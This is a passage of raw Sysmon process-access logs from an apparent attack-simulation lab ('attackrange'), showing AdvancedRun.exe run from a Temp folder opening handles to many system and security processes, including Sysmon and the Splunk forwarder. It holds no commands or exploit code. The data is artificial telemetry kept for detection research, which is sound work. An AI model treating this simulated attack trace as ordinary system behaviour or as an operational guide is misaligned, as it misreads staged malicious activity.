\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004069031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.377{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.377{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.376{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.376{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 